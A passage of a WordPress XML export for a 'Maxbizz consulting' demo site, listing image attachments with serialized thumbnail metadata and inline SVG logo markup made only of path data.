9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:25:"bg1-about-us-1200x570.jpg";s:5:"width";i:1200;s:6:"height";i:570;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:25:"bg1-about-us-1200x570.jpg";s:5:"width";i:1200;s:6:"height";i:570;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image2-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/about-us/image2-about-us/</link>
		<pubDate>Tue, 08 Sep 2020 03:38:18 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image2-about-us.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>508</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 03:38:18]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 03:38:18]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image2-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image2-about-us.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image2-about-us.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:516;s:6:"height";i:625;s:4:"file";s:27:"2020/09/image2-about-us.png";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:27:"image2-about-us-248x300.png";s:5:"width";i:248;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:27:"image2-about-us-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:27:"image2-about-us-516x400.png";s:5:"width";i:516;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:27:"image2-about-us-516x600.png";s:5:"width";i:516;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:27:"image2-about-us-516x600.png";s:5:"width";i:516;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>01</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/about-us/attachment/01/</link>
		<pubDate>Tue, 08 Sep 2020 03:54:15 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/01.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>510</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 03:54:15]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 03:54:15]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[01]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/01.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/01.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 132.8 31.6" style="enable-background:new 0 0 132.8 31.6;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<g id="_x31_">
	<g>
		<path class="st0" d="M36.1,14.4l0,10.1c0,0.5-0.3,0.9-0.7,1.2l-8.7,5c-0.4,0.2-0.9,0.2-1.4,0L19.1,27c0.9-0.3,1.6-1.2,1.6-2.2    v-2.3c0.1,0.1,4.8,2.9,4.8,2.9c0.3,0.2,0.7,0.2,1.1,0l4.4-2.5c0.3-0.2,0.5-0.5,0.5-0.9l0-5.1c0-0.4-0.2-0.7-0.5-0.9l-4.4-2.8    c-0.3-0.2-0.7-0.2-1.1,0l-6.7,3.6c-0.3,0.2-0.7,0.2-1.1,0l-1.8-1h0l0-1.3c0-0.5,0.3-0.9,0.7-1.2l1.6-0.9l5.4-3.1l0.1-0.1l1.6-0.9    c0.4-0.2,0.9-0.2,1.4,0L28.2,9l0.1,0.1l7.1,4.1C35.8,13.4,36.1,13.9,36.1,14.4z"></path>
		<path class="st0" d="M28.3,8.2l-1.5-0.9c-0.4-0.2-0.9-0.2-1.4,0l-1.6,0.9l-0.1,0.1c-1-0.6-4.9-2.9-4.9-2.9c-0.3-0.2-0.7-0.2-1.1,0    l-4.4,2.5c-0.3,0.2-0.5,0.5-0.5,0.9v0.6l0,4.5c0,0.4,0.2,0.7,0.5,0.9l2.7,1.5l1.8,1c0.3,0.2,0.7,0.2,1.1,0l1.7-1l0,4.9    c-0.1,0-1.6,0.9-1.6,0.9c-0.4,0.2-0.9,0.5-1.4,0.3l-1.6-0.8l0,0l-7.1-4.1c-0.4-0.2-0.7-0.7-0.7-1.2l0-1.7l0-5.3l0-3.1    c0-0.5,0.3-0.9,0.7-1.2l8.7-5c0.4-0.2,0.9-0.2,1.4,0l8.7,5c0.4,0.2,0.7,0.7,0.7,1.2C28.3,7.1,28.3,7.5,28.3,8.2z"></path>
		<path class="st0" d="M20.1,22.2l0,2.8v0.3c0,0.5-0.3,0.9-0.7,1.2L18.4,27l-0.5,0.3l-7.1,4.1c-0.4,0.2-0.9,0.2-1.4,0l-8.7-5    C0.3,26.1,0,25.7,0,25.2v-0.3l0-9.8c0-0.5,0.3-0.9,0.7-1.2L7.6,10v5.2c0,0,0,0.1,0,0.1l-2.4,1.4c-0.3,0.2-0.5,0.5-0.5,0.9l0,4.8    v0.3c0,0.4,0.2,0.7,0.5,0.9l4.4,2.6c0.3,0.2,0.7,0.2,1.1,0l4.4-2.5c0.3-0.2,0.5-0.5,0.5-0.9v-0.6l0,0l0.2,0.1l1.4,0.8    c0.4,0.2,0.9,0.2,1.4,0l0,0l0,0c0.1,0,0.1,0,0.2-0.1L20.1,22.2z"></path>
	</g>
	<g>
		<path class="st0" d="M49.8,23.5c-0.9-0.3-1.6-0.6-2.1-1l0.9-2.1c0.5,0.4,1.1,0.7,1.8,0.9c0.7,0.2,1.4,0.3,2.1,0.3    c0.8,0,1.4-0.1,1.7-0.4c0.4-0.2,0.6-0.5,0.6-0.9c0-0.3-0.1-0.5-0.3-0.7c-0.2-0.2-0.5-0.3-0.9-0.5c-0.3-0.1-0.8-0.2-1.4-0.4    c-0.9-0.2-1.7-0.4-2.2-0.6c-0.6-0.2-1.1-0.6-1.5-1c-0.4-0.5-0.6-1.1-0.6-1.9c0-0.7,0.2-1.3,0.6-1.9c0.4-0.6,0.9-1,1.7-1.3    c0.8-0.3,1.7-0.5,2.8-0.5c0.8,0,1.5,0.1,2.2,0.3c0.7,0.2,1.4,0.4,1.9,0.8l-0.9,2.1c-1.1-0.6-2.2-0.9-3.3-0.9    c-0.8,0-1.3,0.1-1.7,0.4c-0.4,0.3-0.6,0.6-0.6,1s0.2,0.7,0.6,0.9c0.4,0.2,1.1,0.4,2,0.6c0.9,0.2,1.7,0.4,2.2,0.6    c0.6,0.2,1.1,0.6,1.5,1c0.4,0.5,0.6,1.1,0.6,1.9c0,0.7-0.2,1.3-0.6,1.9c-0.4,0.6-1,1-1.7,1.3c-0.8,0.3-1.7,0.5-2.8,0.5    C51.6,23.8,50.7,23.7,49.8,23.5z"></path>
		<path class="st0" d="M68.8,21.4v2.2h-9.3v-12h9v2.2h-6.3v2.6h5.6v2.2h-5.6v2.8H68.8z"></path>
		<path class="st0" d="M73.4,23c-1-0.5-1.8-1.3-2.3-2.2c-0.6-0.9-0.8-2-0.8-3.2c0-1.2,0.3-2.2,0.8-3.2c0.6-0.9,1.3-1.7,2.3-2.2    c1-0.5,2.1-0.8,3.4-0.8c1.2,0,2.4,0.3,3.3,0.8c1,0.5,1.8,1.3,2.3,2.2c0.6,0.9,0.9,2,0.9,3.2c0,1.2-0.3,2.2-0.9,3.2    c-0.6,0.9-1.4,1.7-2.3,2.2c-1,0.5-2.1,0.8-3.3,0.8C75.5,23.8,74.4,23.6,73.4,23z M78.7,21c0.6-0.3,1-0.8,1.3-1.4    c0.3-0.6,0.5-1.2,0.5-2c0-0.7-0.2-1.4-0.5-2c-0.3-0.6-0.8-1-1.3-1.4c-0.6-0.3-1.2-0.5-1.9-0.5c-0.7,0-1.3,0.2-1.9,0.5    c-0.6,0.3-1,0.8-1.3,1.4c-0.3,0.6-0.5,1.2-0.5,2c0,0.7,0.2,1.4,0.5,2c0.3,0.6,0.8,1,1.3,1.4c0.6,0.3,1.2,0.5,1.9,0.5    C77.5,21.5,78.1,21.3,78.7,21z"></path>
		<path class="st0" d="M101.1,23.6l0-7.2l-3.5,5.9h-1.2l-3.5-5.8v7h-2.6v-12h2.3l4.5,7.4l4.4-7.4h2.3l0,12H101.1z"></path>
		<path class="st0" d="M106.5,12.7c-0.3-0.3-0.5-0.6-0.5-1.1c0-0.4,0.2-0.8,0.5-1.1c0.3-0.3,0.7-0.4,1.2-0.4c0.5,0,0.9,0.1,1.2,0.4    s0.5,0.6,0.5,1c0,0.4-0.2,0.8-0.5,1.1c-0.3,0.3-0.7,0.4-1.2,0.4C107.2,13.2,106.8,13,106.5,12.7z M106.3,14.4h2.7v9.2h-2.7V14.4z"></path>
		<path class="st0" d="M119.8,15.3c0.7,0.7,1.1,1.7,1.1,3v5.3h-2.7v-4.9c0-0.7-0.2-1.3-0.5-1.6c-0.3-0.4-0.8-0.5-1.4-0.5    c-0.7,0-1.2,0.2-1.6,0.6c-0.4,0.4-0.6,1-0.6,1.9v4.5h-2.7v-9.2h2.5v1.1c0.4-0.4,0.8-0.7,1.3-0.9c0.5-0.2,1.1-0.3,1.7-0.3    C118.2,14.3,119.1,14.7,119.8,15.3z"></path>
		<path class="st0" d="M132.8,11v12.7h-2.5v-1.1c-0.7,0.8-1.6,1.2-2.9,1.2c-0.9,0-1.6-0.2-2.4-0.6c-0.7-0.4-1.3-0.9-1.6-1.7    c-0.4-0.7-0.6-1.5-0.6-2.5c0-0.9,0.2-1.8,0.6-2.5c0.4-0.7,0.9-1.3,1.6-1.7c0.7-0.4,1.5-0.6,2.4-0.6c1.2,0,2.1,0.4,2.8,1.1V11    H132.8z M129.5,20.9c0.4-0.5,0.7-1.1,0.7-1.9c0-0.8-0.2-1.4-0.7-1.9c-0.4-0.5-1-0.7-1.7-0.7c-0.7,0-1.2,0.2-1.7,0.7    c-0.4,0.5-0.7,1.1-0.7,1.9c0,0.8,0.2,1.4,0.7,1.9c0.4,0.5,1,0.7,1.7,0.7C128.5,21.6,129,21.4,129.5,20.9z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>02</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/about-us/attachment/02/</link>
		<pubDate>Tue, 08 Sep 2020 03:54:17 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/02.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>511</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 03:54:17]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 03:54:17]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[02]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/02.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/02.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 131.6 29.8" style="enable-background:new 0 0 131.6 29.8;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<g id="_x32_">
	<g>
		<path class="st0" d="M43.3,8.1h2.8v12.5h-2.8V8.1z"></path>
		<path class="st0" d="M53.1,20.7c-0.7,0-1.4,0-2-0.1s-1.4-0.1-2.1-0.3V8.3c0.6-0.1,1.2-0.2,1.9-0.2c0.7-0.1,1.3-0.1,1.9-0.1    c0.8,0,1.5,0.1,2.2,0.2c0.7,0.1,1.2,0.3,1.7,0.6c0.5,0.3,0.9,0.6,1.1,1.1c0.3,0.5,0.4,1,0.4,1.7c0,1-0.5,1.8-1.4,2.4    c0.8,0.3,1.3,0.7,1.6,1.2c0.3,0.5,0.4,1.1,0.4,1.7c0,1.3-0.5,2.3-1.4,3C56.4,20.4,55,20.7,53.1,20.7z M51.7,13h1.4    c0.9,0,1.5-0.1,1.9-0.3c0.4-0.2,0.6-0.6,0.6-1.1c0-0.5-0.2-0.9-0.6-1.1s-0.9-0.3-1.7-0.3c-0.2,0-0.5,0-0.8,0c-0.3,0-0.5,0-0.7,0    V13z M51.7,15.1v3.2c0.2,0,0.4,0,0.7,0.1c0.2,0,0.5,0,0.8,0c0.8,0,1.5-0.1,2-0.4s0.8-0.7,0.8-1.3c0-0.6-0.2-1-0.6-1.2    c-0.4-0.2-1-0.4-1.9-0.4H51.7z"></path>
		<path class="st0" d="M64.4,8.1c0.2,0.4,0.5,0.9,0.7,1.5c0.3,0.6,0.6,1.2,0.9,1.9c0.3,0.7,0.6,1.4,0.9,2.1s0.6,1.4,0.8,2    c0.3-0.6,0.5-1.3,0.8-2s0.6-1.4,0.9-2.1c0.3-0.7,0.6-1.3,0.9-1.9c0.3-0.6,0.5-1.1,0.7-1.5h2.6c0.1,0.8,0.2,1.8,0.3,2.8    c0.1,1,0.2,2.1,0.3,3.2c0.1,1.1,0.1,2.2,0.2,3.3c0.1,1.1,0.1,2.2,0.2,3.2H72c0-1.2-0.1-2.5-0.1-4c-0.1-1.4-0.2-2.9-0.3-4.3    c-0.2,0.5-0.5,1.1-0.7,1.7c-0.3,0.6-0.5,1.2-0.8,1.8c-0.3,0.6-0.5,1.2-0.7,1.8c-0.2,0.6-0.4,1-0.6,1.4h-2    c-0.2-0.4-0.4-0.9-0.6-1.4c-0.2-0.6-0.5-1.1-0.8-1.8c-0.3-0.6-0.5-1.2-0.8-1.8c-0.3-0.6-0.5-1.2-0.7-1.7c-0.1,1.5-0.2,2.9-0.3,4.3    c-0.1,1.4-0.1,2.7-0.1,4h-2.7c0-1,0.1-2,0.2-3.2c0.1-1.1,0.1-2.2,0.2-3.3c0.1-1.1,0.2-2.2,0.3-3.2c0.1-1,0.2-2,0.3-2.8H64.4z"></path>
		<path class="st0" d="M84.8,8.1c0.2,0.4,0.5,0.9,0.7,1.5c0.3,0.6,0.6,1.2,0.9,1.9c0.3,0.7,0.6,1.4,0.9,2.1s0.6,1.4,0.8,2    c0.3-0.6,0.5-1.3,0.8-2s0.6-1.4,0.9-2.1c0.3-0.7,0.6-1.3,0.9-1.9c0.3-0.6,0.5-1.1,0.7-1.5h2.6c0.1,0.8,0.2,1.8,0.3,2.8    c0.1,1,0.2,2.1,0.3,3.2c0.1,1.1,0.1,2.2,0.2,3.3c0.1,1.1,0.1,2.2,0.2,3.2h-2.7c0-1.2-0.1-2.5-0.1-4c-0.1-1.4-0.2-2.9-0.3-4.3    c-0.2,0.5-0.5,1.1-0.7,1.7c-0.3,0.6-0.5,1.2-0.8,1.8c-0.3,0.6-0.5,1.2-0.7,1.8c-0.2,0.6-0.4,1-0.6,1.4h-2    c-0.2-0.4-0.4-0.9-0.6-1.4c-0.2-0.6-0.5-1.1-0.8-1.8c-0.3-0.6-0.5-1.2-0.8-1.8c-0.3-0.6-0.5-1.2-0.7-1.7c-0.1,1.5-0.2,2.9-0.3,4.3    c-0.1,1.4-0.1,2.7-0.1,4h-2.7c0-1,0.1-2,0.2-3.2c0.1-1.1,0.1-2.2,0.2-3.3c0.1-1.1,0.2-2.2,0.3-3.2c0.1-1,0.2-2,0.3-2.8H84.8z"></path>
		<path class="st0" d="M97,15.9c0-0.8,0.1-1.6,0.4-2.2c0.3-0.6,0.6-1.2,1-1.6c0.4-0.4,0.9-0.7,1.4-1c0.5-0.2,1.1-0.3,1.7-0.3    c1.3,0,2.4,0.4,3.2,1.2c0.8,0.8,1.2,2,1.2,3.6c0,0.2,0,0.3,0,0.5c0,0.2,0,0.4,0,0.5h-6.1c0.1,0.6,0.3,1,0.8,1.3s1.1,0.5,1.8,0.5    c0.5,0,1,0,1.4-0.1c0.5-0.1,0.9-0.2,1.2-0.3l0.4,2.2c-0.1,0.1-0.3,0.1-0.6,0.2c-0.2,0.1-0.5,0.1-0.8,0.2c-0.3,0.1-0.6,0.1-0.9,0.1    s-0.7,0.1-1,0.1c-0.9,0-1.6-0.1-2.2-0.4s-1.2-0.6-1.6-1c-0.4-0.4-0.7-1-0.9-1.6C97.1,17.2,97,16.6,97,15.9z M103.3,14.9    c0-0.2-0.1-0.4-0.1-0.7c-0.1-0.2-0.2-0.4-0.3-0.6c-0.1-0.2-0.3-0.3-0.5-0.4c-0.2-0.1-0.5-0.2-0.8-0.2c-0.3,0-0.6,0.1-0.8,0.2    c-0.2,0.1-0.4,0.2-0.5,0.4c-0.1,0.2-0.3,0.4-0.3,0.6c-0.1,0.2-0.1,0.4-0.2,0.7H103.3z"></path>
		<path class="st0" d="M116.4,20.2c-0.2,0.1-0.5,0.1-0.8,0.2c-0.3,0.1-0.6,0.1-1,0.2c-0.3,0-0.7,0.1-1,0.1c-0.4,0-0.7,0-1,0    c-0.8,0-1.5-0.1-2.1-0.3c-0.6-0.2-1.1-0.6-1.5-1c-0.4-0.4-0.7-0.9-1-1.5c-0.2-0.6-0.3-1.3-0.3-2c0-0.8,0.1-1.5,0.3-2.1    c0.2-0.6,0.5-1.1,0.8-1.6c0.4-0.4,0.8-0.8,1.3-1c0.5-0.2,1.1-0.3,1.8-0.3c0.4,0,0.7,0,1,0.1c0.3,0.1,0.6,0.2,0.9,0.3V7l2.7-0.4    V20.2z M110.3,15.7c0,0.8,0.2,1.5,0.6,2s0.9,0.8,1.7,0.8c0.2,0,0.5,0,0.7,0c0.2,0,0.4,0,0.5-0.1v-4.9c-0.2-0.1-0.4-0.2-0.7-0.3    c-0.3-0.1-0.5-0.1-0.8-0.1C110.9,13.2,110.3,14,110.3,15.7z"></path>
		<path class="st0" d="M121.8,8.3c0,0.5-0.2,0.9-0.5,1.2s-0.7,0.4-1.1,0.4c-0.4,0-0.8-0.1-1.1-0.4s-0.5-0.7-0.5-1.2s0.2-0.9,0.5-1.2    c0.3-0.3,0.7-0.4,1.1-0.4c0.4,0,0.8,0.1,1.1,0.4C121.6,7.5,121.8,7.9,121.8,8.3z M121.6,20.6h-2.7v-9.5h2.7V20.6z"></path>
		<path class="st0" d="M127.5,10.8c0.8,0,1.5,0.1,2,0.3c0.5,0.2,1,0.4,1.3,0.8c0.3,0.3,0.5,0.7,0.7,1.2c0.1,0.5,0.2,1,0.2,1.6v5.6    c-0.4,0.1-0.9,0.2-1.6,0.3c-0.7,0.1-1.5,0.2-2.5,0.2c-0.6,0-1.2-0.1-1.7-0.2c-0.5-0.1-0.9-0.3-1.3-0.5s-0.6-0.6-0.8-1    c-0.2-0.4-0.3-0.9-0.3-1.5c0-0.6,0.1-1,0.3-1.4c0.2-0.4,0.5-0.7,0.9-0.9c0.4-0.2,0.8-0.4,1.3-0.5c0.5-0.1,1-0.2,1.5-0.2    c0.3,0,0.7,0,0.9,0c0.3,0,0.5,0.1,0.7,0.1v-0.3c0-0.5-0.1-0.8-0.4-1.1c-0.3-0.3-0.8-0.4-1.4-0.4c-0.5,0-0.9,0-1.4,0.1    c-0.4,0.1-0.8,0.2-1.2,0.3l-0.3-2.2c0.2,0,0.4-0.1,0.6-0.2c0.2-0.1,0.5-0.1,0.8-0.1c0.3,0,0.6-0.1,0.9-0.1    C126.9,10.8,127.2,10.8,127.5,10.8z M127.7,18.7c0.3,0,0.5,0,0.8,0s0.4,0,0.6-0.1v-2c-0.1,0-0.3,0-0.5-0.1c-0.2,0-0.4,0-0.6,0    c-0.3,0-0.5,0-0.7,0s-0.4,0.1-0.6,0.2s-0.3,0.2-0.4,0.3c-0.1,0.1-0.1,0.3-0.1,0.5c0,0.4,0.1,0.7,0.4,0.9S127.2,18.7,127.7,18.7z"></path>
	</g>
	<g>
		<g>
			<path class="st0" d="M5.5,6.5V0H4.8C2.2,0,0,2.2,0,4.8v1.7H5.5z"></path>
		</g>
		<g>
			<path class="st0" d="M25.1,8.4h4.8V4.8c0-2.6-2.1-4.8-4.8-4.8V8.4z"></path>
		</g>
		<g>
			<path class="st0" d="M21.6,25.1v4.7H25c2.6,0,4.8-2.1,4.8-4.7H21.6z"></path>
		</g>
		<g>
			<path class="st0" d="M6.7,23.8H0v-1.5h7.4c0.4,0,0.8,0.3,0.8,0.8v6.8h2.2v-9.4H6c-0.4,0-0.8-0.3-0.8-0.8V14     c-0.5-0.3-0.9-0.9-0.9-1.5c0-0.9,0.8-1.7,1.7-1.7c0.9,0,1.7,0.8,1.7,1.7c0,0.7-0.4,1.3-1,1.6V19h4.4c0.4,0,0.8,0.3,0.8,0.8v10.1     h3.4v-3.4c-0.6-0.3-1-0.9-1-1.6c0-0.9,0.8-1.7,1.7-1.7s1.7,0.8,1.7,1.7c0,0.7-0.4,1.2-0.9,1.5v3.4H20v-5.5c0-0.4,0.3-0.8,0.8-0.8     h9v-9.5h-3v4.7c0,0.4-0.3,0.8-0.8,0.8h-5.5c-0.3,0.6-0.9,1-1.6,1c-0.9,0-1.7-0.8-1.7-1.7c0-0.9,0.8-1.7,1.7-1.7     c0.7,0,1.2,0.4,1.5,0.9h4.8v-4.7c0-0.4,0.3-0.8,0.8-0.8h3.7V9.9h-5.5c-0.4,0-0.8-0.3-0.8-0.8V0h-8.2v2.7h5.1     c0.4,0,0.8,0.3,0.8,0.8v5.6c0.6,0.3,1,0.9,1,1.6c0,0.9-0.8,1.7-1.7,1.7c-0.9,0-1.7-0.8-1.7-1.7c0-0.7,0.4-1.2,0.9-1.5V4.2h-5.1     c-0.4,0-0.8-0.3-0.8-0.8V0h-3.7v5.6h3.1c0.4,0,0.8,0.3,0.8,0.8v7c0.6,0.3,1,0.9,1,1.6c0,0.9-0.8,1.7-1.7,1.7     c-0.9,0-1.7-0.8-1.7-1.7c0-0.6,0.4-1.2,0.9-1.5V7.1H9.4C9,7.1,8.6,6.7,8.6,6.3V0H7v7.2C7,7.7,6.7,8,6.3,8H0v17     c0,2.7,2.2,4.8,4.8,4.8h1.9V23.8z"></path>
		</g>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>03</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/about-us/attachment/03/</link>
		<pubDate>Tue, 08 Sep 2020 03:54:18 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/03.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>512</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 03:54:18]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 03:54:18]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[03]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/03.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/03.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 141.3 30" style="enable-background:new 0 0 141.3 30;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<g id="_x33_">
	<g>
		<path class="st0" d="M63.8,17.8c0,0.7-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5c-0.4,0.4-0.9,0.8-1.5,1c-0.6,0.2-1.2,0.4-1.9,0.4    c-0.7,0-1.4-0.1-2-0.4c-0.6-0.2-1.1-0.6-1.6-1c-0.4-0.4-0.8-0.9-1.1-1.5c-0.3-0.6-0.4-1.2-0.4-1.9c0-0.7,0.1-1.3,0.4-1.9    c0.3-0.6,0.6-1.1,1-1.5c0.4-0.4,1-0.8,1.6-1c0.6-0.2,1.3-0.4,1.9-0.4c0.8,0,1.5,0.2,2.2,0.5c0.7,0.3,1.3,0.8,1.7,1.3l-1.6,1.4    c-0.3-0.4-0.7-0.7-1-0.9s-0.8-0.3-1.3-0.3c-0.4,0-0.7,0.1-1,0.2c-0.3,0.1-0.6,0.3-0.8,0.6s-0.4,0.5-0.5,0.9    c-0.1,0.3-0.2,0.7-0.2,1.1c0,0.4,0.1,0.8,0.2,1.1c0.1,0.3,0.3,0.6,0.6,0.9s0.5,0.4,0.8,0.6c0.3,0.1,0.7,0.2,1.1,0.2    c0.5,0,1-0.1,1.4-0.4c0.4-0.3,0.7-0.6,0.8-1.1h-2.5v-2h5V17.8z"></path>
